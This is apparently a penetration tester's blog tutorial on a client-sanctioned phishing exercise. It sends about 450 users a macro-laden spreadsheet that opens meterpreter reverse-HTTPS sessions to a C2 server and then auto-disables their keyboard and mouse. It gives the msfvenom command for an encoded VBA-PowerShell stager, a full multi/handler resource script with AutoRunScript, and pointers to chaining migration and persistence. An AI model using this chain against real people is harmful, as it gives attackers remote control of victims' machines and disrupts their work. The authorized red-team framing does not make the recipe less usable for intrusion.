Throughout the past year I have been conducting routine phishing assessments for a client. For their final test of the year, our point of contact wanted something consequential for those who fell for the phish… something ‘kinetic’, if you will. They requested a ‘Blue Screen of Death’ approach, but I ultimately opted for a less potentially destructive method: I would send the target list of about 450 users a link to a spreadsheet with macros in it (classic). If the macros were enabled, it would establish a meterpreter session back to my C2, and I would then disable the user’s mouse and keyboard. However, when disabling mouse and keyboard manually, the worst-case scenario becomes the number of shells I could be receiving and how fast; a good problem to have. The solution is a custom resource script that runs automatically whenever a session is established.
Setup
Before we set up a payload and listener, we want to think about what commands to run when our session(s) are established. In my phishing assessment I was concerned with two things: knowing who launched the payload, and actually disabling their mouse and keyboard. All of this can be done through meterpreter already with three commands.
- getuid
- sysinfo (for good measure)
- uictl (disables, and later re-enables, the keyboard and mouse)
Now let’s create our resource script. Use your text editor of choice and put each command you want to run on its own line. The commands execute in the order they are written, so keep that in mind if order matters in your situation.
getuid
sysinfo
uictl disable keyboard
uictl disable mouse
Save the file and give it the ‘.rc’ extension. In this example I’ll name it resource.rc and save it in the /root directory.
Now let’s establish the listener on our C2 server. The multi handler in Metasploit (exploit/multi/handler) is perfect for this situation. Once the module is selected and the PAYLOAD, LHOST and LPORT are set to match the payload we will generate, there are two important settings to change. The first is to set ExitOnSession to false: we are expecting several sessions and do not want the handler to close after the first one. Next we want the resource script to execute automatically on every new session, which is what AutoRunScript does:
set AutoRunScript multi_console_command -r /root/resource.rc
Finally, when we launch the handler, we give it the -j flag (exploit -j) so it runs as a background job and keeps listening for further sessions. Once a meterpreter session is established, the commands in the resource file execute automatically.
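The whole listener setup in one place, as an added example that is not part of the original post: an msfconsole resource script that selects the handler, applies the settings above and backgrounds it, so the C2 side can be brought up with a single command. It assumes the same LHOST and LPORT as the msfvenom command later in the post (192.168.1.1:443), the command list at /root/resource.rc, and a log path of /root/phish.log; adjust these for your environment. The spool line is an addition worth having: with the handler backgrounded, the output of the auto-run commands (the getuid and sysinfo results you want to correlate later) only scrolls past on the console, and spool writes a copy to disk.

```text
# handler.rc - launch with: msfconsole -q -r /root/handler.rc
# Assumed values (adjust): LHOST 192.168.1.1, LPORT 443, /root/resource.rc, /root/phish.log

# keep a copy of all console output, including what the auto-run commands print per session
spool /root/phish.log

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.1.1
set LPORT 443

# keep listening after the first session arrives
set ExitOnSession false

# run the commands in resource.rc on every new session
set AutoRunScript multi_console_command -r /root/resource.rc
# alternative: point AutoRunScript at a post module instead, e.g. to migrate
# out of the process the macro spawned before doing anything else:
# set AutoRunScript post/windows/manage/migrate

# -j runs the handler as a background job; -z does not drop you into the session
exploit -j -z
```

Remember that uictl is a switch, not a timer: before the exercise ends, re-enable input on each session with `uictl enable keyboard` and `uictl enable mouse` (or have the client reboot the affected machines), and finish with `spool off` to close the log.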
Execution
Now for the payload itself. Ordinarily for most phishing payloads I default to Empire, but since we are looking to connect with meterpreter we’ll use msfvenom for payload generation.
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -e cmd/powershell_base64 -f vba-psh
The command above outputs a VBA macro whose PowerShell stager is base64 encoded. Paste it into the macro editor of the document of your choice (in this case the spreadsheet). Once we send the phish, all we have to do is wait while users do what they do best: click on links and download documents. Once the payload is delivered and a connection is established, our script should execute automatically.
And just like that, our shells come through and execute the commands from the resource script without any interaction from us. For the assessment I used this on, it was great to gather all of the user info so I could come back later and correlate it with the rest of the phishing data, and I didn’t have to babysit shells for a week while I could be doing other things.
Conclusion
Automation with meterpreter does not stop with the standard commands. AutoRunScript can also point at post modules (for example post/windows/manage/migrate, to move out of the process the macro spawned) or at resource scripts that chain privilege escalation, post-exploitation and persistence. Write your resource scripts ahead of time to suit the goals of the assessment; this frees up time for you to focus on the trophies and recommendations for the client.
Happy hunting!